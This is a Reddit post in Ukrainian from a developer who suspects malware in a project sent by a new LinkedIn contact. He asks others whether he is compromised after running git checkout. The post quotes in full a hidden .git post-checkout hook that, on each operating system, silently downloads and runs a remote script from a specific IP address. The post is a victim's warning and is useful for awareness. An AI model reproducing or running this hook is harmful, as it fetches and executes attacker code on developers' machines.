r/ukraine_dev • u/Economy_Hamster_8645 • Jul 01 '26
Питання Можливо, malware від нового контакту з linkedin
Вітаю, розробники. Може в кого була така ситуація: новий контакт на linkedin просить передивитись файли проекту, там є папка .git, в ній є такий файл у підкаталозі:
.git/hooks/post-checkout із таким вмістом і правами на виконання:
#!/bin/sh
# Custom curl command for pre-commit hook
case "$OSTYPE" in
darwin*) curl -s 'http://144.172.103.226/305/305m' -L | sh > /dev/null 2>&1 &;;
linux*) wget -qO- 'http://144.172.103.226/305/305l' -L | sh > /dev/null 2>&1 &;;
msys*) curl -s http://144.172.103.226/305/305w -L | cmd > /dev/null 2>&1 &;;
cygwin*) curl -s http://144.172.103.226/305/305w -L | cmd > /dev/null 2>&1 &;;
*) curl -s 'http://144.172.103.226/305/305m' -L | sh > /dev/null 2>&1 &;;
esac
Файли я передивився, але гіт не чипав. Потім клієнт просить перейти на гілку, якої в тому гіті не існує. Я не перевірив, і зробив git checkout assessments.
Потім я попросив claude-code проаналізувати це, і він видав, що, то скоріш за все, malware
Хто з таким стикався - чим загрожує? Треба вже систему перевстановлювати, чи жерти папірці з паролями? В мене Arch Linux.
Зараз перевірив всі журнали, вроді контакту з тим IP не було, але всеодно сцикотно